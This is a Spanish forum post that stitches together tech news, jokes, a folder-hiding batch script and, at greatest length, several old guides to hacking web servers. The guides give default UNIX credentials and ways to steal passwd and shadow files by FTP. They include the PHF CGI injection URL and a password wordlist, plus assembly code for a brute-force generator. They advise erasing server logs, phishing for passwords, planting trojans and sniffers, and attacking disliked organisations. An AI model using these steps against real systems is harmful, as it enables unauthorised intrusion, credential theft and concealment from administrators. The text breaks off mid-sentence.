marceltrio2
Usuario (República Dominicana)

Android supera a iOS en EuropaEl sistema operativo de Google creció un 16,2% en Europa durante el último año, frente al incremento del 1,2% que experimentó iOS, de Apple. El despegue de Android en el mercado estadounidense es ya indiscutible a estas alturas, pero al sistema operativo de Google seguía resistiéndosele Europa. Ahora, según confirma el último estudio de comScore, Android sobrepasa a iOS en el Viejo Continente y se coloca a una distancia cada vez menor de Symbian, que sigue ostentando el liderazgo.El informe de comScore, que se centra en la adopción de plataformas móviles en Francia, Alemania, Italia, Reino Unido y España, muestra un espectacular crecimiento del 16,2% entre julio de 2010 y julio de 2011.El sistema operativo de Apple, iOS, sólo ha escalado un 1,2% en el mismo periodo, mientras que Symbian, de Nokia, ha visto cómo su cuota de mercado se reducía considerablemente. En cuarto lugar se sitúa Research in Motion, fabricante de BlackBerry, con un crecimiento similar al de iOS.Finalmente, Microsoft cae a la quinta posición tras haber perdido un 4,8% de cuota de mercado antes de confiarse a Nokia en una alianza que tomará forma a finales de este año.el mejor sistema operativo para telefono inteligente

17 cosas curiosas sobre las computadoras en las películas 1.Equipo de la más alta tecnología es manejado a través de la línea de comandos de D.O.S. 2. Nadie se preocupa por los backups 3.Todos los lectores de medios están siempre a la mano. Si alguien llega con un floppy de 5 1/4, seguro hay un lector de esos discos por ahí 4.No importa lo que le pidas que haga a la computadora, siempre te dirá cuánto falta para completar la misión 5.Cuando alguien busca datos, comienzan a aparecer todas las demás opciones en rápida sucesión, como cuando buscan huellas digitales 6.Cuando los actores están frente a una computadora y la toma es de perfil, sus rostros se iluminan como si estuvieran frente a un foco de 100 watts 7.Borrar teras de información es cuestión de segundos (y siempre se consigue antes de que los chicos malos tiren la puerta) 8.Todo es plug and play. En las películas no tienen que vérselas con drivers y cosas de esas. Lo conectan y listo. 9.Los expertos en computadoras siempre teclean como poseídos 10.Los procesadores de textos no tienen cursores 11.Todos los monitores despliegan fuentes de 5 centímetros de alto 12.Las terminales (cuadros de comandos) entienden el lenguaje común y corriente 13.Las computadoras hacen “beep” cuando las personas teclean Enter o Delete o cualquier otra tecla importante. 14. Las conexiones de internet en las películas parecen tener 2 gigabytes por segundo de velocidad. 15. Cuando las cosas salen mal, las computadoras echan chispas, explotan, se sobrecalientan y empiezan a arrojar humo 16. Jamás verás que un experto en computadoras apriete el botón de retroceso porque ha tecleado mal una letra. Jamás. 17. Las fotografías pueden ampliarse indefinidamente, hasta encontrar el detalle que se estaba buscando, como si el concepto de pixel no existiera. espero que te alla gustado
Mac Vs. PC, PC Ganó ya hace tiempo Aún al día de hoy existe una típica batalla entre usuarios de equipo de Apple y todo el resto, la típica batalla de Mac Vs. PC, sin embargo para detener esta batalla les confirmo, PC ganó. Sé que si eres fan de Macintosh en este momento haz de estar buscando comentar en este blog para debatir mi punto, sin embargo aquí te comparto mi fundamento para decirte que PC ganó. El hardware que utilizaba Apple para su Macintosh fue tan ineficiente en el mercado del diseño y el multimedia que debieron cambiar todo su hardware al hardware de PC, donde hay más fabricantes, más accesorios y más compatibilidad. El mismo Steve Jobs afirmo en “All Things Digital” estar extremadamente satisfecho de haber cambiado de plataforma, de los procesadores PowerPC a los de Intel, ya que percibe más eficiencia, menor costo, menor necesidad de enfriamiento que dio mayor espacio en el “enclosure” y un sin número de ventajas. Como puedes observar, el Hardware de PC le termino ganando al de Macintosh, es todo un hecho, sin embargo queda un factor más, el software y en este caso es el sistema operativo, aquí también PC ganó. Alrededor del 84 Apple empezó a sufrir una serie de problemas internos que causaron el retiro de Steve Jobs como CEO de Apple, en su partida Steve Jobs se dedico a trabajar con distintas implementaciones de Unix con el objeto de crear “el siguiente” sistema operativo, como dijera el mismísimo Jobs en inglés The “Next-Generation” OS . Alrededor de 1996 Steve Jobs en su retorno a Apple llevo consigo la idea de renovar el Mac OS con su sistema operativo creado en NeXT, y así lo hizo, en Marzo del 2001 el sistema operativo de Macintosh fue remplazado por un sistema operativo de PC, el Mac OS X, una versión muy bien pulida de Unix. Como te puedes dar cuenta, tanto el software como el hardware de Macintosh fueron remplazados por el de PC, Prácticamente las Mac son PC ahora (prueba Bootcamp), es por eso que te digo, PC ganó, y hace tiempo, sin embargo a la fecha Apple ha creado muy buenos productos e innovado con ideas bastante buenas, en algunos casos han tomado ideas viejas y poco exitosas y las han sabido mercadear bien y hacerlas exitosas, como con los MP3 players de Creative y el iPod, aun hoy los fabricantes de software y hardware ven hacia Apple para seguir las tendencias que ellos crean. Personalmente soy usuario de equipo de Apple (entre otros), y lo encuentro tanto fascinante como peligroso, estaré comentando de estas experiencias próximamente en mi siguiente publicación en este blog. Fuentes: Apple: Intel in Macs http://www.apple.com/se/intel/ espero que te alla gustado
Cómo grabo un CD-R en Mac OS? El programa Toast para Mac OS parece funcionar bien con ficheros .iso. Para mayor seguridad, proporcione el código del creador CDr3 (o posiblemente CDr4) y escriba el código iImg usando por ejemplo FileTyper. Al hacer doble clic en el fichero se abrirá directamente Toast, sin tener que hacer arrastrar y soltar o ir al menú Archivo/Abrir. Otra opción es Disk Copy (incluido en Mac OS X 10.1 y posteriores): Tras abrir la aplicación Disk Copy (en la carpeta /Aplicaciones/Utilidades), seleccione Grabar imagen... en el menú Imagen y seleccione la imagen del CD a grabar. Asegúrese de que la configuración es la correcta, luego pulse sobre Grabar.

si los Sistemas Operativos fueran navajas He encontrado esta imagen por la red, y me ha parecido la mar de interesante, varias herramientas, todas ellas cortantes y, por que no, pequeñas armas o navajas. Y cada una con sus características, como los Sistemas Operativos a los que representan: Apple MacOS: Pequeño, precioso a la vista y con una sola herramienta, aunque eso si, funciona a la perfección para su cometido. Microsoft Windows: Grande, sin diseño, pero con dos mil cosas de las que posiblemente solo acabes usando una por que o no sabes que las demás existen, o no entiendes su funcionamiento, o directamente, es tan complicado de usar que desistes. Linux: Diseños mas bien toscos pero que cumplen a las mil maravillas. Los mas extraños a simple vista, un montón de sabores para siempre el mismo producto, y cada uno con sus pequeñas diferencias. Mas difíciles de usar que los demás (no es lo mismo un sable láser que un par de navajas ) pero en cambio, con un potencial muchísimo mas grande. espero que te alla gustado

proteger carpeta con contraseña sin instalar nada 1) Abrir un bloc de notas: Vamos al menu Inicio > Ejecutar , escribimos notepad y aceptamos; o vamos a Inicio > Programas > Accesorios > Bloc de notas 2) Dentro de ahi debemos pegar esto: cls @ECHO OFF title Folder Nombre de la carpeta if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Nombre de la carpeta goto MDLOCKER :CONFIRM echo Are you sure you want to lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Nombre de la carpeta "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to unlock folder set/p "pass=>" if NOT %pass%== contraseña goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Nombre de la carpeta echo Folder Unlocked successfully goto End AIL echo Invalid password goto end :MDLOCKER md Nombre de la carpeta echo Nombre de la carpeta created successfully goto End :End En donde dice "Nombre de la carpeta" debemos escribir/reemplazar por el nombre de la carpeta que queremos proteger. SOLO EL NOMBRE, NO LA RUTA DE LA CARPETA. Y en donde dice contraseña hay que reemplazarlo por la contraseña que queremos poner. 3) Hacemos click en Archivo > Guardar como y en nombre escribimos block.bat o el nombre que queramos pero que termine en .bat ; y en donde dice Tipo seleccionamos Todos los archivos y damos click en Guardar El archivo debemos guardarlo en la carpeta donde se encuentra la carpeta que queremos proteger. Si la carpeta esta en C: el archivo .bat tambien debera estar ahí. Esta Bueno comenten

" Guia para crackear Websites & Homepages" por Le PomPaItor "Lo espantoso no es la altura, sino la pendiente. La pendiente donde la mirada se precipita a lo hondo y la mano se extiende hacia la cumbre. Alli es donde se apodera del corazon el vertigo de su doble voluntad." -Federico Nietzsche 1. IntroduccionSi alguna vez has hechado a volar tu imaginacion se te habra ocurrido que seria comico remover algunas graficas de algun website, o mejor aun borrar toda la pagina de algun enemigo para deleitarte con tu venganza. Pues bien, este es el manual que te ayudara a lograrlo.Primero deberas entender que andar por ahi borrando paginas es *TONTO* e inmaduro. Lo que trato de hacer es que sientas la adrenalina de entrar a un sistema al que no estes autorizado y echar una ojeada alrededor. Si te dedicas a invadir sistemas y borrar archivos le quitaras el privilegio a otra persona de entrar a ese sistema ya que el operador se dara cuenta de la intrusion y aumentaran la seguridad negando asi la entrada a mas 'intrusos'. Si el sistema al que entraste pertenece a unos hijos de la chingada (Plantas Nucleares, Creadores de abrigos de piel, Agencias de Gobierno,etc) olvida lo antes dicho y haz que se arrepientan de haberse conectado a la red causando kaos o mejor aun, infectandolos con algun buen virus (por que no reemplazar un ejecutable por un caballo de troya?). En fin, usa tu cabeza y cuida de no ser sorprendido en tus viajes de kAoS. 2. WebsitesUn website es solamente una computadora llamada servidor por su capacidad de de realizar diferentes tareas al mismo tiempo, ejecutando un sistema operativo que generalmente sera UNIX o algunas de sus variaciones y con toda la informacion guardada en algun medio. 2.1 Ganando acceso a un servidor WWWAqui reside la magia del Hacker, la proteccion comun son dos preguntas Login y Password. El usuario que tenga una cuenta en ese servidor tiene un nombre de usuario (Login) y contrase¤a (Password) por lo que la entrada a ese servidor no tiene problemas; pero para una persona ajena a ese servidor la entrada es un poco mas complicada.Para poder penetrar el sistema necesitamos saber su URL y una vez conectados con el explorador prestar atencion al mensaje waiting reply from 103.38.28 o algo parecido que haga aparecer una direccion IP en lugar de el nombre de dominio.Si lograste conseguir la direccion IP usa telnet para conectarte a esa direccion. Si cuando tratas de conectarte aparece el mensaje 'connection refused' probablemente este protegida esa direccion con una FIREWALL. Si este es el caso trata de hacer telnet a el nombre de dominio con la finalidad de llegar a el frustrante LOGIN/PASSWORD.Para entrar necesitas conseguir alguna cuenta haciendo algo de ingenieria social o intenta con los defaults. * CUENTAS DEFAULTS DE UNIX *Login: Password:root rootroot systemsys syssys systemdaemon daemonuucp uucptty ttytest testunix unixunix testbin binadm admadm adminadmin admadmin adminsysman sysmansysman syssysman systemsysadmin sysadminsysadmin syssysadmin systemsysadmin adminsysadmin admwho wholearn learnuuhost uuhostguest guesthost hostnuucp nuucprje rjegames gamesgames playersysop sysoproot sysopdemo demo Si fracasas al intentar el acceso usando cada uno de los anteriores logins, probablemente tengas que conseguir el password de otra manera como relaciones humanas; esto significa que vas a tener que conseguir la clave valiendote de trucos como hablar por telefono a una persona que sepas que esta registrada en ese servidor y pedirle su Login y Password diciendo que necesitas validar su cuenta o algo parecido. Otra manera de conseguir un Password es crear un programa que robe las claves de acceso del disco duro de una persona. 3. Cuando se esta adentroUna vez que hayas logrado entrar a un sistema necesitaras localizar y obtener el archivo passwd disponible en el directorio /etcPara obtener el archivo PASSWD usa el siguiente ejemplo:($ simboliza el prompt UNIX)$ ftpFTP> get /etc/passwdFTP> quitPara ver el contenido de el archivo usa el siguiente comando:$ cat /etc/passwd Una vez que tengas en tu posesion el archivo PASSWD editalo y fijate en su contenido, debera tener la siguiente informacion: usuario:contrase¤a:ID:Grupo:descripcion/nombre:directorio:shellusuario - Este es el login de algun usuario.contrase¤a - Es el password de el usuario (encriptada con DES)ID - Es la identificacion de ese usuario.grupo - El grupo al que pertenece esta cuenta.descripcion- El nombre del usuario.directorio - El directorio de acceso de el usuario.shell - El shell que procesa los comandos de ese usuario. Un ejemplo podria ser: john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/johnNombre de usuario: johnPassword encriptado: 234abc56Usuario numero: 9999Numero de grupo: 13Descripcion: John JohnsonDirectorio de acceso: /home/dir/johnShell: /bin/johnSi el archivo que conseguiste contiene la misma informacion pero en el campo del password tiene un asterisco (*) o cualquier otro caracter, significa que las contrase¤as se encuentran 'sombreadas'.Si las contraseñas se encuentra sombreada,las podras encontrar en el archivo shadow aunque generalmente no se puede tener acceso a ese archivo a menos de tener root. Una forma de conseguir SHADOW es usando el comando cp para copiarlo a otro archivo y despues tratar de obtener el archivo al que se copio, ejemplo:$cp /etc/shadow /usuarios/carlos/hack.txt$ftpFTP> get /usuarios/carlos/hack.txtFTP> quit$rd /usuarios/carlos/hack.txtAlgunas otras maneras de obtener el archivo SHADOW seran explicadas en otros numeros de RareGaZz. Ya tengo los passwords encriptados, ahora que?Los passwords estan encriptados usando one-way encription, significa que no se pueden des-encriptar. Lo que Unix hace es obtener la contraseña del usuario,la encripta y la compara con la que ya esta encriptada, si coinciden entonces se le permite el acceso.Para poder obtener las contraseñas es necesario tener un archivo con palabras y usar un programa para que encripte las palabras del archivo y las compare con las contrase¤as encriptadas,si coinciden te avisa que palabra fue la que coincidio con la contrase¤a encriptada.Algunos programas de este tipo son:Nombre Palabras por Segundo ComputadoraJohn the Ripper 5077 586Starcracker 1300 586Cracker Jack 1008 586KillerCracker 350 586Estos programas se encuentran disponibles en cualquier pagina de Hackers, si quieres la ultima version de StarCracker visita la siguiente URL: http://www.geocities.com/SiliconValley/park/8403/index.htmlPara conseguir listas de palabras haz FTP a el siguiente servidor:warwick.ac.ukdirectorio: /pub/cudAlgunas de las palabras mas usadas en contraseñas son: aaa academia ada adrian aerobics airplane albany albatros albert alex alexander algebra alias alisa alpha alphabet ama amy analog anchor andy andrea animal answer anything arrow arthur ass asshole athena atmosphere bacchus badass bailey banana bandit banks bass batman beautiful beauty beaver daniel danny dave deb debbie deborah december desire desperate develop diet digital discovery disney dog drought duncan easy eatme edges edwin egghead eileen einstein elephant elizabeth ellen emerald engine engineer enterprise enzyme euclid evelyn extension fairway felicia fender finite format god hello idiot jester john johnny joseph joshua judith juggle julia kathleen kermit kernel knight lambda larry lazarus lee leroy lewis light lisa louis love lynne mac macintosh mack maggot martin marty marvin matt master maurice maximum merlin mets michael michelle mike minimum nicki nicole rascal really rebecca remote rick reagan robot robotics rolex ronald rose rosebud rosemary roses ruben rules ruth sal saxon scheme scott secret sensor serenity sex shark sharon shit shiva shuttle simon simple singer single singing smile smooch smother snatch snoopy soap socrates spit spring subway success summer super support surfer suzanne tangerine tape target taylor telephone temptation tiger tigger toggle tomato toyota trivial unhappy unicorn unknown urchin utility vicki virginia warren water weenie whatnot whitney will virgin william winston willie wizard wonbat yosemite zap whatnow Obtuve algunas cuentas, ahora?Para poder hacer y deshacer en el servidor necesitas el password de la cuenta root. Si despues de intentar con algunas listas de palabras no puedes necesitaras hacer un ataque en bruto, es decir empezar desde la letra A hasta la palabra zzzzzzzzEl siguiente programa necesita ser compilado usando TASM y es una lista de palabras TSR que no ocupa espacio en disco y puede ser modificada, es ideal para ataques brutos a la cuenta r00t (Programa Copiado de Phrack 47) P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit+++++++++++++++++++++++++++++++++++++++++++++Que tan practico es?Este programa no necesita mucho espacio en disco y puede crear listas de palabras de gran tama¤o.Con el ejemplo proporcionado, passwords empezando en 'aaaaaaa' y terminando en 'zzzzzzz' seran generados. Como empiezo a usar esta lista de palabras?Compila el codigo y nombralo "hackdrv.sys", despues necesitas configurarlo añadiendo la siguiente linea en CONFIG.SYSdevice=c:hackdrv.sysUna vez en memoria el programa creara la lista de variables en memoria llamada HACKPWD. Cualquier programa que uses (excepto StarCracker) debera reconocer hackpwd como una lista de palabras y empezar a crackear .Si deseas reiniciar una sesion desde una combinacion especifica solo modifica el archivo HACKDRV.SYS con un editor HEXADECIMAL y modifica la cadena de caracteres con los que empieza ;-0;-----------------------cut here--------------------------------;Program HACKDRV.SYS;org 0hnext_dev dd -1attribute dw 0c000h ;character device w/ ioctl callsstrategy dw dev_strategyinterrupt dw dev_intdev_name db 'HACKPWD 'countr dw offset numbernumber db 'aaaaaa',0ah ;<---- 6 caracteres en minusculas (empiezo)numsize equ $-number - 2afternum:;working space for device driverrh_ofs dw ?rh_seg dw ?dev_strategy: ;strategy routinemov cs:rh_seg,esmov cs:rh_ofs,bxretfdev_int: ;interrupt routinepushfpush dspush espush axpush bxpush cxpush dxpush dipush sicldpush cspop dsmov bx,cs:rh_segmov es,bxmov bx,cs:rh_ofsmov al,es:[bx]+2rol al,1mov di,offset cmdtabxor ah,ahadd di,axjmp word ptr[di] cmdtab: ;command tabledw init ;0dw exit3 ;1dw exit3 ;2dw ioctl_read ;3dw do_read ;4dw exit3 ;5dw exit3 ;6dw exit3 ;7dw exit3 ;8dw exit3 ;9dw exit3 ;10dw exit3 ;11dw ioctl_write ;12dw exit3 ;13dw 5 dup (offset exit3) ioctl_read:push espush bxmov si,es:[bx+10h]mov di,es:[bx+0eh]mov es,sipush cspop dsmov si,offset numberxor cx,cxget_char:lodsbstosbinc clcmp al,0ahjz ioctl_rendjmp get_charioctl_rend:pop bxpop esmov es:[bx+012h],cxmov cs:countr,offset numberjmp exit2ioctl_write:push espush bxmov si,es:[bx+010h]mov ds,simov si,es:[bx+0eh]mov cx,numsize+1 ;es:[bx+012h]push cspop esmov di,offset numberrepe movsbpop espop bxmov cs:countr,offset numberjmp exit2 do_read:push espush bx push cspop dsmov si,[countr]inc si ;word ptr [countr]cmp si,offset afternumjnz is_okaymov si,offset numbercall inc_num is_okay:mov [countr],simov di,es:[bx]+0ehmov ax,es:[bx]+010hmov cx, es:[bx]+012hjcxz clean_upmov es,axrepe movsbclean_up:pop bxpop esjmp exit2 exit3: mov es:word ptr 3[bx],08103hjmp exit1exit2:mov es:word ptr 3[bx],0100hexit1:pop sipop dipop dxpop cxpop bxpop axpop espop dspopfretfexit:inc_num proc near push si mov si,numsize reiterate: inc byte ptr [number+si] cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range jnz _exit mov byte ptr [number+si],'a' ;starting char. in range dec si cmp si,-1 jnz reiterate mov byte ptr ,01ah ;send EOF _exit: pop si retinc_num endp at_eof: ; the non-resident code starts hereinitial proc nearpush espush cspop dspush cspop esmov si,offset numbermov di,offset tmpnumcld_again:lodsbcmp al,0ahjz _nomorecharsstosbjmp _again_nomorechars:mov si,offset msgendmov cx,4repe movsbmov ah,09 ;print welcome messagemov dx,offset msg1int 21hpop esretinitial endpinit: call initialmov ax,offset at_eofmov es:[bx]+0eh,axpush cspop axmov es:[bx]+010h,axmov cs:word ptr cmdtab,offset exit3jmp exit2 msg1 db "Incremental Password Generator (c)1995",0ah,0dh db "Written by Uncle Armpit",0ah,0dh,0ah,0dh db "Starting at word ["tmpnum db 10 dup (?)msgend db "]",0a,0d,'$';END hackdrv.sys----------------------------------cut here---------------------------------- Como limpiar tus huellasSi deseas que tu ingreso con la cuenta r00t no quede registrado en los LOGS de el servidor revisa los directorios buscando archivos como logs, syslog, log, o cualquiera que parezca que guarda un reporte de los accesos y borralos o mejor aun editalos usando el editor de archivos de UNIX. Para ejecutar el editor usa el comando viEdita o borra los siguientes archivos: /etc/syslog /etc/log /etc/logsExisten algunos scripts para borrar las huellas como ZAP! disponibles en la red y en los proximos numeros de esta revista. Le PompaItor Hackear Paginas WEB: * Introducción* Diferencias en los tipos de WEB* Obteniendo Passwords en el tipo A.* Obteniendo Passwords en el tipo B.* Precauciones.* Sobre el autor 1º INTRODUCIÓN El objetivo de este documento es el dar a conocer posibles formas de alteración del contenido de una página WEB por personal no autorizado a ello ( llamémoslo hacking ).No me hago responsable del uso que se pueda hacer de este documento, pues su única finalidad es la de informar, y el que lo use para otra cosa... lo hace bajo SU entera responsabilidad... ¿ Queda claro ?, si no te parece bien deja de leer y borra el fichero de tu HD ( disco duro para los muy novatos...). Las cosas que se describen en este fichero no te aseguran éxito seguro, probablemente en la mayoría de los casos solo te sirvan para empezar, teniendo que improvisar tu, pero prometo que este doc. será mejor que los que he visto sobre el tema en Internet. El nivel de este documento es básico, pues no intenta enseñar todo en un dia, mas que nada saber como empezar a hacer algo digamos "util". Nota: A pesar de que podras hacer todo lo que aquí pone desde Windows 95 o 98, te recomiendo que pruebes algun Linux (aunque sea el Trinux, que cabe en 3 disketes x´PPP (www.trinux.org)). Este documento esta escrito en WORD pk lo tiene todo cristo ( jeje casi todos ilegal para que se joda Microsoft (con perdon)). 2º DIFERENCIAS ENTRE TIPOS DE WEBs Creo que para que nos entendamos mejor, es importante distinguir entre dos clases de WEBs, las webs personales, que pueden ser modificadas por el usuario propietario mediante su clave (tipo Geocities, Xoom y los proveedores de acceso a Inet que ofrecen espacio WEB).El segundo tipo, serian aquellas WEBs, llamemoslas "principales" de un servidor, que solo pueden ser modificadas por usuarios con muy altos privilegios (llamemosles "root" o "administrador".Pues que bien ¿no?, y esta diferenciación tan chorra... ¿para que vale?... pues la utilizaremos para diferenciar las formas de hacernos con los passwords que nos dejan modificarlas... evidentemente no es igual de facil conseguir ser root en un server que tener una cuenta de usuario... asi que para esto es la diferenciación. 3º OBTENIENDO PASSWORDS DE TIPO A (USUARIO): Estos passwords de usuarios, generalmente no muy cualificados, se caracterizan por ser muy chorras, osea faciles de recordar, repetidos con los passwords de otras cosas... asi que si la persona propietaria de las WEB es alguien cercano a ti, puedes empezar provando algunas palabras que te puedan parecer "interesantes" ( nombre del perro, mujer, hijos, fecha de nacimiento, lugar de residencia...), pero tampoco te mates mucho provando pues esto es perder el tiempo muchas veces, asi que si a los 10 o 11 intentos ( según tu paciencia ) no sale nada, mejor dejes esta forma Pero también seria una buena idea intentar sacar el password a la "victima" a traves de engaños y demas ( lo llaman ingenieria social...), por ejemplo puedes ligarte al tio/a y conseguir que te diga su pass... o tambien puedes intentar meterle un troyano tipo BO o NETBUS, que te permitiran sacarle las pass, evidentemente no voy a contar aquí lo que le tienes que decir a la victima para que te crea... eso tendras que currelarlo tu un pokito Ademas, si conseguimos el fichero de passwords del servidor... ¡¡Estamos de suerte!! Pues generalmente los passwords de usuario son bastante fáciles de crackear ... solo elige el usuario y pon el john the ripper a trabajar ( el john es uno de los programas de cracking de ficheros PASSWD de UNIX mas conocidos, puedes conseguirlo en www.geocities.com/SiliconValley/Peaks/7837 , si no sabes usarlo... DON´T WORRY, trae ayuda...).Pero probablemente el problema no sea el uso del John, sino el conseguir el fichero PASSWD, asi que para eso vamos al siguiente apartado de este cursillo. 3º OBTENIENDO PASSWORDS DE TIPO B (root): Normalmente los administradores de los servidores no se chupan el dedo, asi que conseguir el fichero o el root directamente a traves de un exploit ( programa que se aprovecha de un BUG o agujero en el sistema operativo) no sea una tarea facil. Lo primero que puedes intentar es pillar el passwd por el FTP... y cuando eso no te haya funcionado probar el PHF ( escribir la siguiente linea en tu navegador: http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd , donde host.com es el nombre del servidor...), si el phf funcionase ( en estos tiempos ya suele estar parcheado en casi todos los servidores, asi que si no te sirve no te deprimas), tendrias en tu pantalla el fichero passwd, pero antes de alegrarte fijate en algo, si aparece: root:*:0:0:Charlie &:/root:/bin/csh ( un asterisco (*) detrás del nombre "root" y los dos puntos, también puede aparecer una equis (x)...), querra decir que el fichero esta shadow osea que aparte del PASSWD necesitas otro archivo... el SHADOW, puedes intentar sacarlo con PHF cambiando la palabra passwd del final de la linea del PHF por la palabra shadow ( para ser un poco mas explicito puedes jugar con el phf, cambiando de directorio... supongo que te estaras dando cuenta de cómo y si no, hay va una pista... "etc" es el nombre de un directorio ). Buiino, si lo anterior no ha funcionado, no te preocupes, aún tenemos mas bazas que jugar.Si por cualquier casualidad de la vida posees una cuenta de usuario en el servidor, puedes intentar hacerte con el passwd ( y con el shadow si hace falta) a traves de telnet ( prueba con cat o more , para ver si Dios es tu amigo y puedes editar los archivos...) o, puedes enterarte del Sistema operativo que usa el server, version ... (enterate también de la version del STMP, FTP ...) y vete a buscar exploits ( ya explique antes lo que son exploits...).Una vez que lo/s tengas pues... los pruebas!!! ¿Sino para que coño los has cojido?... para provarlos, primero tendras que compilarlos ( ojo, hay sploits que no hay que compilar, pues simplemente consisten en teclear unos comandos o algo asi... jeje si tienes algo de esperiencia seguro que recuerdas algunos viejos compañeros ).Un buen sitio para pillar exploits es: http://www.rootshell.com/ ¿ Y donde los compilo ?, pues o el propio server ( con gcc ) o en otro con el mismo SO, ojo no puedes compilar exploits para un SUN en un linux Red Hat ... una vez que lo tengas compilado lo ejecutas... y a ¡jugar! Despues de todo esto, y otro poco por tu parte seguramente ya tengas root en algun pequeño server para provar... (recuerda si no tienes mucha soltura... empieza por china o por alli lejotes... que si te pillan no se meteran mucho contigo ¿verdad?). 4º PRECAUCIONES Pues eso... procura no usar cuentas verdaderas para conectar ( aunque piensa que si dejas huellas... los marrones seran pal dueño de la cuenta, y eso no esta bien..., asi que cuidado con las cuentas de internet robadas, solo usar las que sepais que el dueño es un verdadero hijoputa o algo asi... o mejor si usas servidores "intermedios" o borras las huellas con algun zapper ( si lo usas sastamente como un exploit)... ahh, si te kurrelas un root y tal, pues deja algun sniffer y eso para recoger la cosecha... ( mas ke na no desperdiciar kurro ya hecho). 5º SOBRE EL AUTOR Pues el capullo que escribe todo esto es CHEvARA, individuo que podreis encontrar en el IRC hispano por #scripting, #hack o #comunistas, cuya WEB por si quieres verla es: www.geocities.com/SiliconValley/Peaks/7837 y e-mail por si tenes algo que comentar: chevara@hotmail.com . Me he decidido a escribir esto simplemente porque ley un doc sobre el tema tan malo que me dije... por muy mal que lo haga yo seguro que queda algo mas "util", y aquí esta, espero que a alguien le sirva de algo... CopyRight by CHEvARA ´98Saludos para todos mis colegas del IRC y para los demas miembros de GHT.Si quieres poner este doc. en una web o FTP, por favor avisame ( no pedir permiso, sino avisar para que me haga ilu y me emociones y todo eso ... x´P ) COMO HACKEAR PÁGINAS WEB(BlackJack Ago-97)blackbot@hotmail.comhttp://www.redestb.es/personal/lcdBien.. seguro que este es uno de los puntos que más interesa a los hackers novatillos...Ante la falta de documentos de este tipo en castellano, he decidido crear este yo mismo.No voy a explicar todas las técnicas que se pueden usar para conseguirlo, (ya no las se).Las técnicas son infinitas. Por cada agujero posible en un sistema, hay una técnica. Solo es necesario encontrar la adecuada. Antes que nada debemos inspeccionar el lugar que vamosa "visitar". Debemos buscar todos los posibles accesos al sistema... (telnet, ftp, etc...)COGIENDO EL FICHERO DEL PASSWORD A TRAVES DE FTPOk, bien... Una de las formas más facil de conseguir ser "superusuario" en el sistema es accediendo a traves de ftp anónimoal fichero "passwd". Primero necesitas conocer algo sobre los ficheros password:root:User:g36Dfr:1j2YF6:1256:20:SuperuserCamilo:p5P:h0iuE:2552:20:Camilo,:/usr/personal/camilo:/bin/cshBlackJack:EUhg3zACG2ab:1128:20:BlacJack LCD:/usr/personal/lcd:/bin/cshEste es el ejemplo de un fichero encriptado normal. El superusuario es la parte que te da el root. Es la parte que nos interesa.root:*:0:1:Misericordios/bin/shftp:*:202:102:Anonymous FTP:/U1/ftpftpadmin:*:203:102:ftp Administrator:/u1/ftpEste es otro ejemplo de un fichero password, solo que este tiene una pequeña diferenciaeste está controlado. Los password controlados no te dejan ver o copiar el actual passwordencriptado . Esto causa problemas para el Cracker y el diccionario que uses (después se explica).Losiguiente es otro ejemplo de otro password controlado:root:*:0:1:0000-Admin(0000):7:/usr/bin/cshdaemon:*:1:1:0000-Admin(0000)bin:*:2:2:0000-Admin(0000):/usr/bin:etc...los password controlados tienen un "*" o "x" en el lugar donde va el password.Ahora que tu conoces un poco más acerca de como identificar un password encriptado de un password controlado, podemos hablar de como crackearlo.Cracker un password no es tan complicado como parece. Los archivos varían de sistema a sistema.Debemos antes que nada, de hacernos con el fichero passwd.Bajatelo a tu disco duro. Una vez lo tengas en tu disco duro necesitas un cracker y un diccionario. Puedes usar el Cracker Jack, John the ripper (aconsejado), jack the ripper, brute force cracker.... Los puedes encontrar en cualquier página de hacking, incluido la mía.http://www.redestb.es/personal/lcdCuando ejecutes el cracker, deberas indicar cual es el fichero passwd. Hay muchos sistemas parabuscar el passwd. Aqui es donde actua el diccionario. Un diccionario encuentra todaslas posibles combinaciones posibles con el alfabeto que uses, incluyendo toda clase de caracteres "raros". Lo normal es que tenga predefinido miles de palabras posibles.Si este método no funciona se hace un rastreo completo, probando todas las combinacionesposibles desde 1 caracter hasta el total permitido. Asi SIEMPRE lo encuentra, aunque el problema está en que tarda mucho. Una vez tengas el password, YA ESTA!!!tendrás acceso a todo el sistema. TECNICA PHFla tecnica del phf es una de la más vieja (y que menos suele funcionar,tambien hay que decirlo)de conseguir un password. Es Imprescindible probarla siempre. (por probar que no quede...)ya que no cuesta nada y aveces se encuentra a alguna víctima que cae.Todo lo que debes hacer es abrir tu "notescapes navegando" y escribir lo siguiente:http://www.web_a_hackear.es/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwdreemplaza www.web_a_hackear.es por el dominio. y ya está!. acontinuación se empezará a transmitir una linda copia del fichero conlos password (si funciona, claro está).REDES LOCALESOtro sistema es buscar la direccion IP del dominio a hackear. Todas las máquinas conectadasa la red tienen una dirección IP. por ejemplo:www.probando.comdebemos averiguar el IP de este servidor. (no me jodas con que no sabes como).hay miles, no, millones de programitas que te lo dicen.(hasta con el 7thsphere port fuck que viene con el sript de irc de mismo nombre, te lo dice)suponiendo que fuese:194.179.23.100esto es la dirección IP de la máquina central. Tal vez inaccesible, pero si tiene una red localconectada a esta.. (ordenador del diseñador, del director... que se yo!)las máquinas de la red tendrán un IP muy parecido. Sabes lo que puede pasar si en tunavegador escribes lo siguiente?:194.179.23.101 o 194.179.23.102 ... etc...que accederás a los ordenadores que estén en esa red local (siempre y cuando sean tan capullosde no protegerlos porque no están cara al público!)curioso ¿no?DIRECTORIOS OCULTOSEste método aunque parezca una chorrada... te juro que no lo es.Te voy a narrar algo que paso por diciembre del 96 a un amigo hacker.......a ver... voy a hackear un servidor de Internet...este esta 